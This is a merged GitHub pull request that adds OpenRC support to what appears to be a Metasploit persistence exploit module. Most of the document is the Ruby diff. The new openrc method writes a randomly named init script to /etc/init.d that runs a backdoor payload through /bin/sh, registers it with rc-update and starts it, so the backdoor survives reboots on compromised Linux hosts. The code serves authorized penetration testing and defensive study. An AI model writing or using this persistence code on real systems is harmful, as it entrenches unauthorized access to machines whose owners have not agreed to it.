Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add openrc to exploits/linux/local/service_persistence.rb #19480

Merged
merged 1 commit into from
Oct 2, 2024
Merged

Add openrc to exploits/linux/local/service_persistence.rb #19480

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
46 changes: 46 additions & 0 deletions modules/exploits/linux/local/service_persistence.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,11 @@ def initialize(info = {})
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['openrc', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
}
],
['systemd', 'DefaultOptions' =>
{
'BACKDOOR_PATH' => '/usr/local/bin'
Expand Down Expand Up @@ -118,6 +123,8 @@ def exploit
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
when 'Upstart'
upstart(path, file, target.opts[:runlevel])
when 'openrc'
openrc(path, file)
when 'systemd'
systemd(path, file)
when 'systemd user'
Expand All @@ -131,6 +138,10 @@ def exploit
print_status('Utilizing Upstart')
upstart(path, file, '2345')
end
if service_system_exists?('openrc')
print_status('Utilizing openrc')
openrc(path, file)
end
has_updatercd = service_system_exists?('update-rc.d')
if has_updatercd || service_system_exists?('chkconfig') # centos 5
print_status('Utilizing System_V')
Expand Down Expand Up @@ -397,4 +408,39 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
cmd_exec("/etc/init.d/#{service_filename} start")
end
end

def openrc(backdoor_path, backdoor_file)
# https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
# https://wiki.alpinelinux.org/wiki/OpenRC
# https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
script = %{#!/sbin/openrc-run
name=#{backdoor_file}
command=/bin/sh
command_args="#{backdoor_path}/#{backdoor_file}"
pidfile="/run/${RC_SVCNAME}.pid"
command_background="yes"
}

service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
service_name = "/etc/init.d/#{service_filename}"
vprint_status("Writing service: #{service_name}")
begin
upload_and_chmodx(service_name, script)
rescue Rex::Post::Meterpreter::RequestError
print_error("Writing '#{service_name}' to the target and or changing the file permissions failed, ensure that directory exists?")
end

if !file_exist?(service_name)
print_error('File not written, check permissions.')
return
end

if datastore['EnableService']
vprint_status('Enabling service')
cmd_exec("rc-update add '#{service_filename}'")
end

vprint_status('Starting service')
cmd_exec("'/etc/init.d/#{service_filename}' start")
end
end
Loading